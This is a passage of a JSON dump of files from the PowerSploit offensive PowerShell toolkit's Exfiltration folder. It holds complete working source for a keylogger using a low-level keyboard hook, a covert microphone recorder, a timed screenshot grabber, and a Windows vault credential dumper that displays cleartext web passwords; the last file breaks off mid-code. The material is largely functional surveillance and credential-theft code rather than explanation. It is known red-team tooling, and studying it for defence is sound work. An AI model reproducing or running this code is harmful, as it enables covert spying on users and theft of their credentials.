[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetForegroundWindowAddr, $GetForegroundWindowDelegate)\n\n        # GetWindowText\n        $GetWindowTextAddr = Get-ProcAddress user32.dll GetWindowTextA\n\t    $GetWindowTextDelegate = Get-DelegateType @([IntPtr], [Text.StringBuilder], [Int32]) ([Void])\n\t    $GetWindowText = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetWindowTextAddr, $GetWindowTextDelegate)\n\n        # GetModuleHandle\n        $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA\n\t    $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t    $GetModuleHandle = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)\n    \n        #endregion Imports\n\n        $CallbackScript = {\n            Param (\n                [Parameter()]\n                [Int32]$Code,\n\n                [Parameter()]\n                [IntPtr]$wParam,\n\n                [Parameter()]\n                [IntPtr]$lParam\n            )\n\n            $Keys = [Windows.Forms.Keys]\n        \n            $MsgType = $wParam.ToInt32()\n\n            # Process WM_KEYDOWN & WM_SYSKEYDOWN messages\n            if ($Code -ge 0 -and ($MsgType -eq 0x100 -or $MsgType -eq 0x104)) {\n            \n                $hWindow = $GetForegroundWindow.Invoke()\n\n                $ShiftState = $GetAsyncKeyState.Invoke($Keys::ShiftKey)\n                if (($ShiftState -band 0x8000) -eq 0x8000) { $Shift = $true }\n                else { $Shift = $false }\n\n                $Caps = [Console]::CapsLock\n\n                # Read virtual-key from buffer\n                $vKey = [Windows.Forms.Keys][Runtime.InteropServices.Marshal]::ReadInt32($lParam)\n\n                # Parse virtual-key\n                if ($vKey -gt 64 -and $vKey -lt 91) { # Alphabet characters\n                    if ($Shift -xor $Caps) { $Key = $vKey.ToString() }\n                    else { $Key = $vKey.ToString().ToLower() }\n                }\n                elseif ($vKey -ge 96 -and $vKey -le 111) { # Number pad characters\n                    switch ($vKey.value__) {\n                        96 { $Key = '0' }\n                        97 { $Key = '1' }\n                        98 { $Key = '2' }\n                        99 { $Key = '3' }\n                        100 { $Key = '4' }\n                        101 { $Key = '5' }\n                        102 { $Key = '6' }\n                        103 { $Key = '7' }\n                        104 { $Key = '8' }\n                        105 { $Key = '9' }\n                        106 { $Key = \"*\" }\n                        107 { $Key = \"+\" }\n                        108 { $Key = \"|\" }\n                        109 { $Key = \"-\" }\n                        110 { $Key = \".\" }\n                        111 { $Key = \"/\" }\n                    }\n                }\n                elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) {                      \n                    if ($Shift) {                           \n                        switch ($vKey.value__) { # Shiftable characters\n                            48 { $Key = ')' }\n                            49 { $Key = '!' }\n                            50 { $Key = '@' }\n                            51 { $Key = '#' }\n                            52 { $Key = '$' }\n                            53 { $Key = '%' }\n                            54 { $Key = '^' }\n                            55 { $Key = '&' }\n                            56 { $Key = '*' }\n                            57 { $Key = '(' }\n                            186 { $Key = ':' }\n                            187 { $Key = '+' }\n                            188 { $Key = '<' }\n                            189 { $Key = '_' }\n                            190 { $Key = '>' }\n                            191 { $Key = '?' }\n                            192 { $Key = '~' }\n                            219 { $Key = '{' }\n                            220 { $Key = '|' }\n                            221 { $Key = '}' }\n                            222 { $Key = '<Double Quotes>' }\n                        }\n                    }\n                    else {                           \n                        switch ($vKey.value__) {\n                            48 { $Key = '0' }\n                            49 { $Key = '1' }\n                            50 { $Key = '2' }\n                            51 { $Key = '3' }\n                            52 { $Key = '4' }\n                            53 { $Key = '5' }\n                            54 { $Key = '6' }\n                            55 { $Key = '7' }\n                            56 { $Key = '8' }\n                            57 { $Key = '9' }\n                            186 { $Key = ';' }\n                            187 { $Key = '=' }\n                            188 { $Key = ',' }\n                            189 { $Key = '-' }\n                            190 { $Key = '.' }\n                            191 { $Key = '/' }\n                            192 { $Key = '`' }\n                            219 { $Key = '[' }\n                            220 { $Key = '\\' }\n                            221 { $Key = ']' }\n                            222 { $Key = '<Single Quote>' }\n                        }\n                    }\n                }\n                else {\n                    switch ($vKey) {\n                        $Keys::F1  { $Key = '<F1>' }\n                        $Keys::F2  { $Key = '<F2>' }\n                        $Keys::F3  { $Key = '<F3>' }\n                        $Keys::F4  { $Key = '<F4>' }\n                        $Keys::F5  { $Key = '<F5>' }\n                        $Keys::F6  { $Key = '<F6>' }\n                        $Keys::F7  { $Key = '<F7>' }\n                        $Keys::F8  { $Key = '<F8>' }\n                        $Keys::F9  { $Key = '<F9>' }\n                        $Keys::F10 { $Key = '<F10>' }\n                        $Keys::F11 { $Key = '<F11>' }\n                        $Keys::F12 { $Key = '<F12>' }\n\t\t\t\n                        $Keys::Snapshot    { $Key = '<Print Screen>' }\n                        $Keys::Scroll      { $Key = '<Scroll Lock>' }\n                        $Keys::Pause       { $Key = '<Pause/Break>' }\n                        $Keys::Insert      { $Key = '<Insert>' }\n                        $Keys::Home        { $Key = '<Home>' }\n                        $Keys::Delete      { $Key = '<Delete>' }\n                        $Keys::End         { $Key = '<End>' }\n                        $Keys::Prior       { $Key = '<Page Up>' }\n                        $Keys::Next        { $Key = '<Page Down>' }\n                        $Keys::Escape      { $Key = '<Esc>' }\n                        $Keys::NumLock     { $Key = '<Num Lock>' }\n                        $Keys::Capital     { $Key = '<Caps Lock>' }\n                        $Keys::Tab         { $Key = '<Tab>' }\n                        $Keys::Back        { $Key = '<Backspace>' }\n                        $Keys::Enter       { $Key = '<Enter>' }\n                        $Keys::Space       { $Key = '< >' }\n                        $Keys::Left        { $Key = '<Left>' }\n                        $Keys::Up          { $Key = '<Up>' }\n                        $Keys::Right       { $Key = '<Right>' }\n                        $Keys::Down        { $Key = '<Down>' }\n                        $Keys::LMenu       { $Key = '<Alt>' }\n                        $Keys::RMenu       { $Key = '<Alt>' }\n                        $Keys::LWin        { $Key = '<Windows Key>' }\n                        $Keys::RWin        { $Key = '<Windows Key>' }\n                        $Keys::LShiftKey   { $Key = '<Shift>' }\n                        $Keys::RShiftKey   { $Key = '<Shift>' }\n                        $Keys::LControlKey { $Key = '<Ctrl>' }\n                        $Keys::RControlKey { $Key = '<Ctrl>' }\n                    }\n                }\n\n                # Get foreground window's title\n                $Title = New-Object Text.Stringbuilder 256\n                $GetWindowText.Invoke($hWindow, $Title, $Title.Capacity)\n\n                # Define object properties\n                $Props = @{\n                    Key = $Key\n                    Time = [DateTime]::Now\n                    Window = $Title.ToString()\n                }\n\n                $obj = New-Object psobject -Property $Props\n            \n                # Stupid hack since Export-CSV doesn't have an append switch in PSv2\n                $CSVEntry = ($obj | Select-Object Key,Window,Time | ConvertTo-Csv -NoTypeInformation)[1]\n\n                #return results\n                Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode\n            }\n            return $CallNextHookEx.Invoke([IntPtr]::Zero, $Code, $wParam, $lParam)\n        }\n\n        # Cast scriptblock as LowLevelKeyboardProc callback\n        $Delegate = Get-DelegateType @([Int32], [IntPtr], [IntPtr]) ([IntPtr])\n        $Callback = $CallbackScript -as $Delegate\n    \n        # Get handle to PowerShell for hook\n        $PoshModule = (Get-Process -Id $PID).MainModule.ModuleName\n        $ModuleHandle = $GetModuleHandle.Invoke($PoshModule)\n\n        # Set WM_KEYBOARD_LL hook\n        $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0)\n    \n        $Stopwatch = [Diagnostics.Stopwatch]::StartNew()\n\n        while ($true) {\n            if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break }\n            $PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0)\n            Start-Sleep -Milliseconds 10\n        }\n\n        $Stopwatch.Stop()\n    \n        # Remove the hook\n        $UnhookWindowsHookEx.Invoke($Hook)\n    }\n\n    # Setup KeyLogger's runspace\n    $PowerShell = [PowerShell]::Create()\n    [void]$PowerShell.AddScript($Script)\n    [void]$PowerShell.AddArgument($LogPath)\n    if ($PSBoundParameters.Timeout) { [void]$PowerShell.AddArgument($Timeout) }\n\n    # Start KeyLogger\n    [void]$PowerShell.BeginInvoke()\n\n    if ($PassThru.IsPresent) { return $PowerShell }\n}"
  },
  {
    "path": "Exfiltration/Get-MicrophoneAudio.ps1",
    "content": "function Get-MicrophoneAudio {\r\n<#\r\n.SYNOPSIS\r\nRecords audio from the microphone and saves to a file on disk\r\nAuthor: Justin Warner (@sixdub)\r\nLicense: BSD 3-Clause\r\nRequired Dependencies: None\r\nOptional Dependencies: None\r\n\r\nAll credit for PowerSploit functions belongs to the original author and project contributors. Thanks for the awesomeness! See here for more info: \r\nhttp://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html\r\nhttps://github.com/PowerShellMafia/PowerSploit\r\n\r\nThanks to Ed Wilson (Scripting Guy) for the one liner to generate random chars. https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/05/generate-random-letters-with-powershell/\r\n\r\n.DESCRIPTION\r\nGet-MicrophoneAudio utilizes the Windows API from winmm.dll to record audio from the microphone and saves the wave file to disk.\r\n\r\n.OUTPUTS\r\nOutputs the FileInfo object pointing to the recording which has been saved to disk.\r\n\r\n.PARAMETER Path\r\nThe location to save the audio\r\n\r\n.PARAMETER Length\r\nThe length of the audio to record in seconds. Default: 30\r\n\r\n.PARAMETER Alias\r\nThe alias to use for the WinMM recording. Default: Random 10 Chars\r\n\r\n.EXAMPLE\r\nGet-MicrophoneAudio -Path c:\\windows\\temp\\secret.wav -Length 10 -Alias \"SECRET\"\r\nDescription\r\n-----------\r\nRecords 10 seconds of audio to the path C:\\windows\\temp\\secret.wav using WinMM alias \"secret\"\r\n#>\r\n\t[OutputType([System.IO.FileInfo])]\r\n\tParam\r\n\t(\r\n\t\t[Parameter( Position = 0, Mandatory = $True)]\r\n\t\t[ValidateScript({Split-Path $_ | Test-Path})]\r\n\t\t[String] $Path,\r\n\t\t[Parameter( Position = 1, Mandatory = $False)]\r\n\t\t[Int] $Length = 30,\r\n\t\t[Parameter( Position = 2, Mandatory = $False)]\r\n\t\t[String] $Alias = $(-join ((65..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}))\r\n\r\n\t)\r\n\r\n\t#Get-DelegateType from PowerSploit\r\n\tfunction Local:Get-DelegateType\r\n\t{\r\n\t\tParam\r\n\t\t(\r\n\t\t\t[OutputType([Type])]\r\n\t\t\t\r\n\t\t\t[Parameter( Position = 0)]\r\n\t\t\t[Type[]]\r\n\t\t\t$Parameters = (New-Object Type[](0)),\r\n\t\t\t\r\n\t\t\t[Parameter( Position = 1 )]\r\n\t\t\t[Type]\r\n\t\t\t$ReturnType = [Void]\r\n\t\t)\r\n\r\n\t\t$Domain = [AppDomain]::CurrentDomain\r\n\t\t$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\r\n\t\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\r\n\t\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\r\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\r\n\t\t$ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\r\n\t\t$ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\r\n\t\t$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\r\n\t\t$MethodBuilder.SetImplementationFlags('Runtime, Managed')\r\n\t\t\r\n\t\tWrite-Output $TypeBuilder.CreateType()\r\n\t}\r\n\r\n\t#Get-ProcAddress from PowerSploit\r\n\tfunction local:Get-ProcAddress\r\n\t{\r\n\t\tParam\r\n\t\t(\r\n\t\t\t[OutputType([IntPtr])]\r\n\t\t\r\n\t\t\t[Parameter( Position = 0, Mandatory = $True )]\r\n\t\t\t[String]\r\n\t\t\t$Module,\r\n\t\t\t\r\n\t\t\t[Parameter( Position = 1, Mandatory = $True )]\r\n\t\t\t[String]\r\n\t\t\t$Procedure\r\n\t\t)\r\n\r\n\t\t# Get a reference to System.dll in the GAC\r\n\t\t$SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\r\n\t\t\tWhere-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\r\n\t\t$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\r\n\t\t# Get a reference to the GetModuleHandle and GetProcAddress methods\r\n\t\t$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\r\n\t\t$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\r\n\t\t# Get a handle to the module specified\r\n\t\t$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\r\n\t\t$tmpPtr = New-Object IntPtr\r\n\t\t$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\r\n\t\t\r\n\t\t# Return the address of the function\r\n\t\tWrite-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\r\n\t} \r\n\r\n\t#Initialize and call LoadLibrary on our required DLL\r\n\t$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA\r\n\t$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])\r\n\t$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)\r\n\t$HND = $null\r\n\t$HND = $LoadLibrary.Invoke('winmm.dll')\r\n\tif ($HND -eq $null)\r\n\t{\r\n\t\tThrow 'Failed to aquire handle to winmm.dll'\r\n\t}\r\n\r\n\t#Initialize the function call to count devices\r\n\t$waveInGetNumDevsAddr = $null\r\n\t$waveInGetNumDevsAddr = Get-ProcAddress winmm.dll waveInGetNumDevs\r\n\t$waveInGetNumDevsDelegate = Get-DelegateType @() ([Uint32])\r\n\tif ($waveInGetNumDevsAddr -eq $null)\r\n\t{\r\n\t\tThrow 'Failed to aquire address to WaveInGetNumDevs'\r\n\t}\r\n\t$waveInGetNumDevs = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($waveInGetNumDevsAddr, $waveInGetNumDevsDelegate)\r\n\r\n\t#Initilize the function call to record audio\r\n\t$mciSendStringAddr = $null\r\n\t$mciSendStringAddr = Get-ProcAddress winmm.dll mciSendStringA\r\n\t$mciSendStringDelegate = Get-DelegateType @([String],[String],[UInt32],[IntPtr]) ([Uint32])\r\n\tif ($mciSendStringAddr -eq $null)\r\n\t{\r\n\t\tThrow 'Failed to aquire address to mciSendStringA'\r\n\t}\r\n\t$mciSendString = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mciSendStringAddr, $mciSendStringDelegate)\r\n\r\n\t#Initialize the ability to resolve MCI Errors\r\n\t$mciGetErrorStringAddr = $null\r\n\t$mciGetErrorStringAddr = Get-ProcAddress winmm.dll mciGetErrorStringA\r\n\t$mciGetErrorStringDelegate = Get-DelegateType @([UInt32],[Text.StringBuilder],[UInt32]) ([bool])\r\n\tif ($mciGetErrorStringAddr -eq $null)\r\n\t{\r\n\t\tThrow 'Failed to aquire address to mciGetErrorString'\r\n\t}\r\n\t$mciGetErrorString = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mciGetErrorStringAddr,$mciGetErrorStringDelegate)\r\n\r\n\t#Get device count\r\n\t$DeviceCount = $waveInGetNumDevs.Invoke()\r\n\r\n\tif ($DeviceCount -gt 0)\r\n\t{\r\n\r\n\t\t#Define buffer for MCI errors. https://msdn.microsoft.com/en-us/library/windows/desktop/dd757153(v=vs.85).aspx\r\n\t\t$errmsg = New-Object Text.StringBuilder 150\r\n\r\n\t\t#Open an alias\r\n\t\t$rtnVal = $mciSendString.Invoke(\"open new Type waveaudio Alias $alias\",'',0,0)\r\n\t\tif ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw \"MCI Error ($rtnVal): $msg\"}\r\n\t\t\r\n\t\t#Call recording function\r\n\t\t$rtnVal = $mciSendString.Invoke(\"record $alias\", '', 0, 0)\r\n\t\tif ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw \"MCI Error ($rtnVal): $msg\"}\r\n\t\t\r\n\t\tStart-Sleep -s $Length\r\n\r\n\t\t#save recorded audio to disk\r\n\t\t$rtnVal = $mciSendString.Invoke(\"save $alias `\"$path`\"\", '', 0, 0)\r\n\t\tif ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw \"MCI Error ($rtnVal): $msg\"}\r\n\r\n\t\t#terminate alias\r\n\t\t$rtnVal = $mciSendString.Invoke(\"close $alias\", '', 0, 0);\r\n\t\tif ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw \"MCI Error ($rtnVal): $msg\"}\r\n\r\n\t\t$OutFile = Get-ChildItem -path $path \r\n\t\tWrite-Output $OutFile\r\n\r\n\t}\r\n\telse\r\n\t{\r\n\t\tThrow 'Failed to enumerate any recording devices'\r\n\t}\r\n}\r\n"
  },
  {
    "path": "Exfiltration/Get-TimedScreenshot.ps1",
    "content": "function Get-TimedScreenshot\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nTakes screenshots at a regular interval and saves them to disk.\r\n\r\nPowerSploit Function: Get-TimedScreenshot\r\nAuthor: Chris Campbell (@obscuresec)\r\nLicense: BSD 3-Clause\r\nRequired Dependencies: None\r\nOptional Dependencies: None\r\n    \r\n.DESCRIPTION\r\n\r\nA function that takes screenshots and saves them to a folder.\r\n\r\n.PARAMETER Path\r\n\r\nSpecifies the folder path.\r\n    \r\n.PARAMETER Interval\r\n    \r\nSpecifies the interval in seconds between taking screenshots.\r\n\r\n.PARAMETER EndTime\r\n\r\nSpecifies when the script should stop running in the format HH-MM \r\n\r\n.EXAMPLE \r\n\r\nPS C:\\> Get-TimedScreenshot -Path c:\\temp\\ -Interval 30 -EndTime 14:00 \r\n \r\n.LINK\r\n\r\nhttp://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html\r\nhttps://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1\r\n#>\r\n\r\n    [CmdletBinding()] Param(\r\n        [Parameter(Mandatory=$True)]             \r\n        [ValidateScript({Test-Path -Path $_ })]\r\n        [String] $Path, \r\n\r\n        [Parameter(Mandatory=$True)]             \r\n        [Int32] $Interval,\r\n\r\n        [Parameter(Mandatory=$True)]             \r\n        [String] $EndTime    \r\n    )\r\n\r\n    #Define helper function that generates and saves screenshot\r\n    Function Get-Screenshot {\r\n       $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen\r\n\r\n       $VideoController = Get-WmiObject -Query 'SELECT VideoModeDescription FROM Win32_VideoController'\r\n\r\n       if ($VideoController.VideoModeDescription -and $VideoController.VideoModeDescription -match '(?<ScreenWidth>^\\d+) x (?<ScreenHeight>\\d+) x .*$') {\r\n           $Width = [Int] $Matches['ScreenWidth']\r\n           $Height = [Int] $Matches['ScreenHeight']\r\n       } else {\r\n           $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen\r\n\r\n           $Width = $ScreenBounds.Width\r\n           $Height = $ScreenBounds.Height\r\n       }\r\n\r\n       $Size = New-Object System.Drawing.Size($Width, $Height)\r\n       $Point = New-Object System.Drawing.Point(0, 0)\r\n\r\n       $ScreenshotObject = New-Object Drawing.Bitmap $Width, $Height\r\n       $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)\r\n       $DrawingGraphics.CopyFromScreen($Point, [Drawing.Point]::Empty, $Size)\r\n       $DrawingGraphics.Dispose()\r\n       $ScreenshotObject.Save($FilePath)\r\n       $ScreenshotObject.Dispose()\r\n    }\r\n\r\n    Try {\r\n            \r\n        #load required assembly\r\n        Add-Type -Assembly System.Windows.Forms            \r\n\r\n        Do {\r\n            #get the current time and build the filename from it\r\n            $Time = (Get-Date)\r\n            \r\n            [String] $FileName = \"$($Time.Month)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Day)\" \r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Year)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Hour)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Minute)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Second)\"\r\n            $FileName += '.png'\r\n            \r\n            #use join-path to add path to filename\r\n            [String] $FilePath = (Join-Path $Path $FileName)\r\n\r\n            #run screenshot function\r\n            Get-Screenshot\r\n               \r\n            Write-Verbose \"Saved screenshot to $FilePath. Sleeping for $Interval seconds\"\r\n\r\n            Start-Sleep -Seconds $Interval\r\n        }\r\n\r\n        #note that this will run once regardless if the specified time as passed\r\n        While ((Get-Date -Format HH:mm) -lt $EndTime)\r\n    }\r\n\r\n    Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage}\r\n}\r\n"
  },
  {
    "path": "Exfiltration/Get-VaultCredential.ps1",
    "content": "function Get-VaultCredential\n{\n<#\n.SYNOPSIS\n\nDisplays Windows vault credential objects including cleartext web credentials.\n\nPowerSploit Function: Get-VaultCredential\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n \n.DESCRIPTION\n\nGet-VaultCredential enumerates and displays all credentials stored in the Windows\nvault. Web credentials, specifically are displayed in cleartext. This script was\ninspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt\n\n.EXAMPLE\n\nGet-VaultCredential\n\n.NOTES\n\nOnly web credentials can be displayed in cleartext.\n#>\n    [CmdletBinding()] Param()\n\n    $OSVersion = [Environment]::OSVersion.Version\n\n    #region P/Invoke declarations for vaultcli.dll\n    $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil')\n    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False)\n\n    $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32])\n    $null = $EnumBuilder.DefineLiteral('Undefined', -1)\n    $null = $EnumBuilder.DefineLiteral('Boolean', 0)\n    $null = $EnumBuilder.DefineLiteral('Short', 1)\n    $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2)\n    $null = $EnumBuilder.DefineLiteral('Int', 3)\n    $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4)\n    $null = $EnumBuilder.DefineLiteral('Double', 5)\n    $null = $EnumBuilder.DefineLiteral('Guid', 6)\n    $null = $EnumBuilder.DefineLiteral('String', 7)\n    $null = $EnumBuilder.DefineLiteral('ByteArray', 8)\n    $null = $EnumBuilder.DefineLiteral('TimeStamp', 9)\n    $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10)\n    $null = $EnumBuilder.DefineLiteral('Attribute', 11)\n    $null = $EnumBuilder.DefineLiteral('Sid', 12)\n    $null = $EnumBuilder.DefineLiteral('Last', 13)\n    $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType()\n\n    $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32])\n    $null = $EnumBuilder.DefineLiteral('Illegal', 0)\n    $null = $EnumBuilder.DefineLiteral('Resource', 1)\n    $null = $EnumBuilder.DefineLiteral('Identity', 2)\n    $null = $EnumBuilder.DefineLiteral('Authenticator', 3)\n    $null = $EnumBuilder.DefineLiteral('Tag', 4)\n    $null = $EnumBuilder.DefineLiteral('PackageSid', 5)\n    $null = $EnumBuilder.DefineLiteral('AppStart', 100)\n    $null = $EnumBuilder.DefineLiteral('AppEnd', 10000)\n    $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType()\n\n    $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind])\n    $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet')\n    $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor,\n                                                                                     @([Runtime.InteropServices.LayoutKind]::Explicit),\n                                                                                     $CharsetField,\n                                                                                     @([Runtime.InteropServices.CharSet]::Ansi))\n    $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\n    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4)\n    $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public')\n    $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public')\n    $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public')\n    $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public')\n    $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public')\n    if ($OSVersion -ge '6.2')\n    {\n        $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public')\n    }\n    $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public')\n    $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public')\n    $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public')\n    $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public')\n    $VAULT_ITEM = $TypeBuilder.CreateType()\n\n    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes)\n    $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute)\n    $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0)\n    $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8)\n    $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType()\n\n\n    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class')\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([Guid].MakeByRefType(),\n                                                                 [UInt32],\n                                                                 [IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([IntPtr]),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([Int32],\n                                                                 [Int32].MakeByRefType(),\n                                                                 [IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([IntPtr],\n                                                                 [Int32],\n                                                                 [Int32].MakeByRefType(),\n                                                                 [IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    if ($OSVersion -ge '6.2')\n    {\n        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',\n                                                          'vaultcli.dll',\n                                                          'Public, Static',\n                                                          [Reflection.CallingConventions]::Standard,\n                                                          [Int32],\n                                                          [Type[]] @([IntPtr],\n                                                                     [Guid].MakeByRefType(),\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [Int32],\n                                                                     [IntPtr].MakeByRefType()),\n                                                          [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                          [Runtime.InteropServices.CharSet]::Auto)\n    }\n    else\n    {\n        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',\n                                                          'vaultcli.dll',\n                                                          'Public, Static',\n                                                          [Reflection.CallingConventions]::Standard,\n                                                          [Int32],\n                                                          [Type[]] @([IntPtr],\n                                                                     